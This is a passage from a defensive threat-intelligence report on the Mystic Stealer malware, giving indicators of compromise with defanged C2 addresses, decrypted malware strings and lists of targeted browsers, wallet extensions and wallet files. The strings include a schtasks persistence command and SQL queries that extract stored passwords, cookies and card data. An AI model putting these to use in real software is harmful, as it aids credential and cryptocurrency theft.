non-debug samples). Interestingly, the username in these full paths is will.
ThreatLabz suspects these samples are compiled from code that is still in
development, where the developer could be testing improvements and new features.


CONCLUSION

Even though Mystic Stealer is a relatively new information stealing malware,
ThreatLabz has observed a significant increase in threat actors leveraging it to
deploy additional malware. The developer behind Mystic Stealer is continuously
modifying and improving the code, and the malware is quickly evolving. The C2
communication protocol used by Mystic Stealer has switched from a custom binary
protocol to an HTTP-based protocol, likely to improve beaconing from infections
in corporate environments that leverage firewalls to filter suspicious network
traffic. Based on the number of new Mystic Stealer samples and C2 panels, the
malware is likely to continue to pose a threat to organizations.

In addition to staying on top of these threats, Zscaler's ThreatLabz team
continuously monitors for new threats and shares its findings with the wider
community.


CLOUD SANDBOX

Zscaler’s multilayered cloud security platform detects indicators related to
Mystic Stealer at various levels.




INDICATORS OF COMPROMISE (IOCS)

Hash | First Seen | Expiration Date | Botnet ID | C2
6203249bebf7248535ff5ef70a7c5a57688b399d91ac63c9d73441af6e65f184 | 2023-10-08 08:36:29 UTC | 2023-11-09T20:02:21 | 15 | hxxp://171.22.28[.]235/loghub/master
7eb8617d09f204dd40541a000f9881019ff103ff330cb0e7aebb8c3a160cfd26 | 2023-09-29 15:30:00 UTC | 2023-10-26T11:48:42 | Chung | hxxp://194.87.31[.]123/loghub/master
21a8db193093caf6acbcd14ba64c98a1c9f16998cade8f60fa0fb4dc63e33bd2 | 2023-09-18 21:36:22 UTC | 2023-09-22T12:35:08 | mema | hxxp://5.42.92[.]211/loghub/master
7003eadaef73ac1f2e0f0a86a3d1f5792a5dde3a45ba71e095861b55059b3780 | 2023-09-07 07:53:28 UTC | 2023-09-12T20:08:32 | tresk | hxxp://5.42.92[.]211/loghub/master
00fe26cfe465740e61b99f105bcf2516ff49e117f23f4b508d5256c57fa3fc66 | 2023-06-26 05:51:47 UTC | 2023-07-24T18:48:13 | sup | hxxp://188.40.116[.]251:8005/loghub/master



APPENDIX


DECRYPTED MALWARE STRINGS

 * %08lX%04lX%lu
 * %ix%i
 * %ls %ls
 * %ls [%ls %d] ERROR in %s, line %d, function %s. %s
 * %ls\\%ls
 * %ls\\%ls\\Local State
 * %ls\\*
 * %ls\\Web Data
 * %ls\\cookies.sqlite
 * %ls\\formhistory.sqlite
 * %ls\\places.sqlite
 * %s/%s
 * %userprofile%\\Telegram Desktop\\tdata
 * &&\" **(# +
 * &0'fg{199
 * (ov_(ov
 * ,+& ##*
 * -t{d2
 * ..*($2nd-2d-2o595
 * ..\\stealer\\chromiumbrowsers.cpp
 * ..\\stealer\\filesgrabber.cpp
 * ..\\stealer\\geckobrowsers.cpp
 * ..\\stealer\\httpclient.cpp
 * ..\\stealer\\loader.cpp
 * ..\\stealer\\sqlite3.cpp
 * ..\\stealer\\stealer.cpp
 * /c schtasks /create /F /sc minute /mo 15 /tr \"%ls\" /tn
   \"\\WindowsAppPool\\%ls\"
 * LeaveCriticalSection
 * EnterCriticalSection
 * Advapi32.dll
 * Autofills/%ls_%ls.txt
 * Available KeyboardLayouts: Gonna gather system information
 * Build mark: 
 * CPU: 
 * Can't add task in task scheduleO, COeatePOocessW fails; last eOOoO: %x
 * Can't obtain RmStartSession's address, maybe windows don't support
   RestartManager
 * Can't start process; last error: %x
 * Can't write file; last error: %x
 * Card: 
 * Chromium browsers paths were retrieved
 * ComSpec
 * Command line: %ls
 * ComputerName: 
 * Config retrieved: %d, %d, %d, %d, %d, %d, %d, %d, %d, %d
 * Content-Disposition: form-data; name=\"%s\"
 * Content-Length: %d
 * Content-Type: multipart/form-data; boundary=%s
 * Cookies
 * Cookies/%ls_%ls.txt
 * Country: {country}
 * CreditCards/%ls_%ls.txt
 * Current language: 
 * Default
 * Email
 * Email/Credentials.txt
 * Email: 
 * EnterCriticalSection
 * Expand path: %ls
 * Extensions were retrieved
 * FALSE
 * Failed to connect to %s
 * Failed to download sqlite3.dll
 * Failed to export functions from sqlite3.dll
 * Failed to load sqlite3.dll
 * Failed to retrieve chromium browsers paths
 * Failed to retrieve files grabber paths
 * Failed to retrieve gecko browsers paths
 * File Location: 
 * Files grabber paths were retrieved
 * FilesGrabber: Sent %ls
 * Find chromium cookies db %ls
 * Find chromium extension %ls with id %ls
 * Find chromium history db %ls
 * Find chromium login data db %ls
 * Find chromium web data db %ls
 * Find gecko autofills db %ls
 * Find gecko cookies db %ls
 * Find gecko file %ls
 * Find gecko history db %ls
 * Find steam data, path %ls
 * Gdi32.dll
 * Gecko browsers were retrieved
 * Gecko/%ls/%ls/%ls
 * GetModuleHandleA
 * Global\\%s%x
 * Gonna gather system information
 * Gonna grab ChromiumBrowsers
 * Gonna grab GeckoBrowsers
 * Gonna grab files
 * Gonna grab outlook
 * Gonna grab steam
 * Gonna grab telegrab
 * Gonna take screenshot
 * GrabFiles
 * HH':'mm':'ss
 * HWID: 
 * HandleChromiumBrowsers
 * HandleGeckoBrowsers
 * Hardwares: 
 * History/%ls_%ls.txt
 * Holder: 
 * HttpOpenRequest fails; last error: %x
 * HttpQueryInfo fails; last error: %x
 * IMAP Password
 * IP: {ip}
 * InitializeCriticalSection
 * InternetConnect fails; last error: %x
 * InternetCrackUrl fails; last error: %x
 * InternetOpen fails; last error: %x
 * Kernel32.dll
 * Key: 
 * LeaveCriticalSection
 * Location: {location}
 * Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
 * Name: 
 * Network\\Cookies
 * Ntdll.dll
 * ..\\stealer\\geckobrowsers.cpp
 * Ole32.dll
 * Operation System: 
 * POP3 Password
 * Password: 
 * ProductName
 * Request
 * Retrieve rule FilesGrabber, server side path: %ls
 * Rstrtmgr.dll
 * Rstrtmgr.dllls GetModuleHandleA %sEnterCriticalSections. LeaveCriticalSection
 * SELECT expiration_month, expiration_year, name_on_card, card_number_encrypted
   FROM credit_cards
 * SELECT fieldname, value FROM moz_formhistory
 * SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
 * SELECT host_key, is_httponly, path, is_secure, expires_utc, name,
   encrypted_value FROM cookies
 * SELECT origin_url, username_value, password_value FROM logins
 * SELECT title, url FROM moz_places
 * SELECT url, title FROM urlsFind chromium history db %ls
 * SMTP Server
 * ScreenSize: 
 * Screenshot.jpeg
 * Sent log. Gonna send done message
 * Sent screenshot
 * Software\\Microsoft\\Office
 * Software\\Valve\\Steam
 * Sq~70
 * SrartLoader
 * Start
 * SteamPath
 * Successfully connected to %s
 * Successfully start process
 * SystemInformation.txt
 * Telegram
 * There's file to load. Gonna load it
 * TimeZone: {timezone}
 * Title: 
 * Tkernel32.dll
 * Token retrieved: %s
 * Trying to connect to %s
 * URL: 
 * USERPROFILE|tELEGRAMdESKTOP|TDATA
 * Url: 
 * User32.dll
 * UserName: 
 * Username: 
 * Value: 
 * Wallets/%ls_%ls_%ls
 * Wininet.dllCrypt32.dll
 * Wininet.dllCrypt32.dllGdiplus.dll
 * Wininet.dllCrypt32.dllGdiplus.dllShlwapi.dllKernel32.dll
 * Write file content in %ls
 * Zip code: {zipcode}
 * abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
 * build
 * cert8.db
 * cert9.db
 * chromium-browsers
 * computername
 * encrypted_key
 * extensions
 * filename
 * files
 * done
 * files
 * gecko-browsershi
 * Sent system information
 * kernel32.dll
 * key3.db
 * key4.db
 * loader
 * loghub/master
 * logins.json
 * msgtzn
 * SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion
 * signons.sqlite
 * sqlite3
 * sqlite3_close
 * sqlite3_column_blob
 * sqlite3_column_bytes
 * sqlite3_column_text
 * sqlite3_open
 * sqlite3_open_v2
 * sqlite3_open_v2sqlite3_finalize
 * sqlite3_prepare_v2
 * sqlite3_step
 * token
 * username
 * wallets\\


TARGETED CHROMIUM BROWSERS

 * Citrio|%localappdata%\CatalinaGroup\Citrio\User Data
 * Coowon|%localappdata%\Coowon\Coowon\User Data
 * Liebao|%localappdata%\liebao\User Data
 * QIP Surf|%localappdata%\QIP Surf\User Data
 * Orbitum|%localappdata%\Orbitum\User Data
 * Comodo Dragon|%localappdata%\Comodo\Dragon\User Data
 * Amigo|%localappdata%\Amigo\User\User Data
 * Torch|%localappdata%\Torch\User Data
 * Yandex Browser|%localappdata%\Yandex\YandexBrowser\User Data
 * Comodo|%localappdata%\Comodo\User Data
 * 360Browser|%localappdata%\360Browser\Browser\User Data
 * Maxthon3|%localappdata%\Maxthon3\User Data
 * K-Melon|%localappdata%\K-Melon\User Data
 * Sputnik|%localappdata%\Sputnik\Sputnik\User Data
 * Nichrome|%localappdata%\Nichrome\User Data
 * CocCoc|%localappdata%\CocCoc\Browser\User Data
 * Uran|%localappdata%\Uran\User Data
 * Chromodo|%localappdata%\Chromodo\User Data
 * Mail.Ru|%localappdata%\Mail.Ru\Atom\User Data
 * Brave Browser|%localappdata%\BraveSoftware\Brave-Browser\User Data
 * Opera|%appdata%\Opera Software\Opera Stable
 * Google Chrome|%localappdata%\Google\Chrome\User Data
 * Microsoft Edge|%localappdata%\Microsoft\Edge\User Data
 * Chromium|%localappdata%\Chromium\User Data
 * Opera|%localappdata%\Opera Software
 * ChromePlus|%localappdata%\MapleStudio\ChromePlus\User Data
 * Iridium|%localappdata%\Iridium\User Data
 * 7Star|%localappdata%\7Star\7Star\User Data
 * CentBrowser|%localappdata%\CentBrowser\User Data
 * Chedot|%localappdata%\Chedot\User Data
 * Vivaldi|%localappdata%\Vivaldi\User Data
 * Kometa|%localappdata%\Kometa\User Data
 * Elements Browser|%localappdata%\Elements Browser\User Data
 * Epic Privacy Browser|%localappdata%\Epic Privacy Browser\User Data
 * Uran|%localappdata%\uCozMedia\Uran\User Data
 * Sleipnir|%localappdata%\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer


TARGETED GECKO BROWSERS

 * Firefox|%appdata%\Mozilla\Firefox\Profiles
 * Comodo IceDragon|%appdata%\Comodo\IceDragon\Profiles
 * BlackHawk|%appdata%\NETGATE Technologies\BlackHawk\Profiles
 * Cyberfox|%appdata%\8pecxstudios\Cyberfox\Profiles
 * K-Meleon|%appdata%\K-Meleon\Profiles
 * Icecat|%appdata%\Mozilla\icecat\Profiles


TARGETED BROWSER EXTENSIONS

 * Coinbase Wallet|hnfanknocfeofbddgcijnmhnfnkdnaad
 * Guarda|hpglfhgfnhbgpjdenjgmdgoeiappafln
 * EQUAL Wallet|blnieiiffboillknjnepogjhkgnoapac
 * Jaxx Liberty|cjelfplplebdjjenllpjcblmjkfcffne
 * BitApp Wallet|fihkakfobkmkjojpchpfgcmhfjnmnfpi
 * iWallet|kncchdigobghenbbaddojjnnaogfppfj
 * Wombat|amkmjjmmflddogmhpjloimipbofnfjih
 * MEW CX|nlbmnnijcnlegkjjpcfjclmcfggfefdm
 * GuildWallet|nanjmdknhkinifnkgdcggcfnhdaammmj
 * Saturn Wallet|nkddgncdjgjfcddamfgcmfnlhccnimig
 * Ronin Wallet|fnjhmkhhmkbjkkabndcnnogagogbneec
 * NeoLine|cphhlgmgameodnhkjdmkpanlelnlohao
 * CLV Wallet|nhnkbkgjikgcigadomkphalanndcapjk
 * Liquality Wallet|kpfopkelmapcoipemfendmdcghnegimn
 * Terra Station|aiifbnbfobpmeekipheeijimdpnlpgpp
 * Keplr|dmkamcknogkgcdfhhbddcghachkejeap
 * Sollet|fhmfendgdocmcbmfikdcogofphimnkno
 * Auro Wallet|cnmamaachppnkjgnildpdmkaakejnhae
 * Polymesh Wallet|jojhfeoedkpkglbfimdfabpdfjaoolaf
 * ICONex|flpiciilemghbmfalicajoolhkkenfel
 * Nabox Wallet|nknhiehlklippafakaeklbeglecifhad
 * KHC|hcflpincpppdclinealmandijcmnkbgn
 * MetaMask|nkbihfbeogaeaoehlefnkodbefgpgknn
 * TronLink|ibnejdfjmmkpcnlpebklmnkoeoihofec
 * Binance Chain Wallet|fhbohimaelbohpjbbldcngcnapndodjp
 * Yoroi|ffnbelfdoeiohenkjibnmadjiehjhajb
 * Nifty Wallet|jbdaocneiiinmjbjlgalhcelgbejmnid
 * Math Wallet|afbcbjpbpfadlkmhmclhkeeodmamcflc
 * Temple|ookjlbkiijinhpmnjffcofjonbfbgaoc
 * TezBox|mnfifefkajgofkcjkemidiaecocnkjeh
 * DAppPlay|lodccjjbdhfakaekdiahmedfbieldgik
 * BitClip|ijmpgkjfkbfhoebgogflfebnmejmfbml
 * Steem Keychain|lkcjlnjfpbikmcmbachjpdbijejflpcm
 * Nash Extension|onofpnbbkehpmmoabgpcpmigafmmnjhl
 * Hycon Lite Client|bcopgchhojmggmffilplmbdicgaihlkp
 * ZilPay|klnaejjgbibmhlephnhpmaofohgkpgkd
 * Coin98 Wallet|aeachknmefphepccionboohckonoeemg
 * Authenticator|bhghoamapcdpbohphigoooaddinpkbai
 * Cyano Wallet|dkdedlpgdmmkkfjabffeganieamfklkm
 * Byone|nlgbhdfgdhgbiamfdfmbikcdghidoadd
 * OneKey|infeboajgfhgbjpjbeppbkgnabfdkdaf
 * LeafWallet|cihmoadaighcejopammfbmddcmdekcje
 * Authy|gaedmjdfmmahhbjefcbgaolhhanlaolb
 * EOS Authenticator|oeljdldpnmdbchonielidgobddffflal
 * GAuth Authenticator|ilgcnhelpchnceeipipijaljkblbcobl
 * Trezor Password Manager|imloifkgjagghnncjkhggdhalmcnfklk
 * Ever|cgeeodpfagjceefieflmdfphplkenlfk
 * KardiaChain|pdadjkfkgcafgbceimcpbkalnfnepbnk
 * Rabby|acmacodkjbdgmoleebolmdjonilkdbch
 * Phantom|bfnaelmomeimhlpmgjnjophhpkkoljpa
 * Oxygen|fhilaheimglignddkjgofkcbgekhenbh
 * Pali|mgffkfbidihjpoaomajlbgchddlicgpn
 * XDEFI|hmeobnfnfcmdkdcmlblgagmfpfboieaf
 * Nami|lpfcbjknijpeeillifnkikgncikgfhdo
 * MultiversX DeFi Wallet|dngmlblcodfobpdpecaadgfbcggfjfnm
 * Keeper|lpilbniiabackdjcionkobglmddfbcjo
 * Softlare|bhhhlbepdkbapadjdnnojkbgioiodbic
 * Govy|jnkelfanjkeadonecabehalmbgpfodjm
 * SteemKeychain|jhgnbkkipaallpehbohjmkbjofjdmeid
 * Braavos|jnlgamecbpmbajjfhmmmlhejkemejdma
 * Enkrypt|kkpllkodjeloidieedojogacfhpaihoh
 * OKX|mcohilncbfahbmgdjkbpemcciiolgcge
 * HashPack|gjagmgiddbbciopjhllkdnddhcglnemk
 * Eternl|kmhcihpebfmpgmihbkipmjlmmioameka
 * Pontem Aptos|phkbamefinggmakgklpkljjmgibohnba
 * Martianin|efbglgofoippbgcjepnhiblaibcnclgk
 * Finnie|cjmkndjhnagcfbpiemnkdpomccnjblmj
 * Leap Terra|aijcbedoijmgnlmjeegjaglmepbmpkpi
 * Dashlane|fdjamakpfbbddfjaooikfcpapjohcfmg
 * NordPass|fooolghllnmhmmndgjiamiiodkpenpbb
 * Roboform|pnlccmojcmeohlpggmfnbbiapkmbliob
 * LastPass|hdokiejnpimakedhajhdlcegeplioahd
 * BrowserPass|naepdomgkenhinolocfifgehidddafch
 * MYKI|bmikpgodpkclnkgmnpphehdgcimmided


TARGETED CRYPTOCURRENCY WALLETS

 * Wallets/Jaxx Desktop|%appdata%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb|*.*|0
 * Wallets/Atomic|%appdata%\atomic\Local Storage\leveldb|*.*|0
 * Wallets/Binance|%appdata%\Binance|app-store.json,simple-storage.json,.finger-print.fp|0
 * Wallets/Coinomi|%appdata%\Coinomi\Coinomi\wallets|.wallet,*.config|0
 * Wallets/Exodus|%appdata%\Exodus|exodus.conf.json,window-state.json,passphrase.json,seed.seco,info.seco|1
 * Wallets/Bitcoin Core|%appdata%\Bitcoin\wallets|wallet.dat|1
 * Wallets/Bitcoin Core Old|%appdata%\Bitcoin|*wallet*.dat|0
 * Wallets/Dogecoin|%appdata%\Bitcoin\wallets|*wallet*.dat|0
 * Wallets/Raven Core|%appdata%\Raven|*wallet*.dat|0
 * Wallets/Daedalus Mainnet|%appdata%\Daedalus Mainnet\wallets|she*.sqlite|0
 * Wallets/Blockstream Green|%appdata%\Blockstream\Green\wallets|*.*|1
 * Wallets/Wasabi Wallet|%appdata%\WalletWasabi\Client\Wallets|*.json|0
 * Wallets/Ethereum|%appdata%\Ethereum|keystore|0
 * Wallets/Electrum|%appdata%\Electrum\wallets|*.*|0
 * Wallets/ElectrumLTC|%appdata%\Electrum-LTC\wallets|*.*|0
 * Wallets/Electron Cash|%appdata%\ElectronCash\wallets|*.*|0
 * Wallets/MultiDoge|%appdata%\MultiDoge|multidoge.wallet|0
 * Wallets/Jaxx Desktop Old|%appdata%\jaxx\Local Storage|file__0.localstorage|0





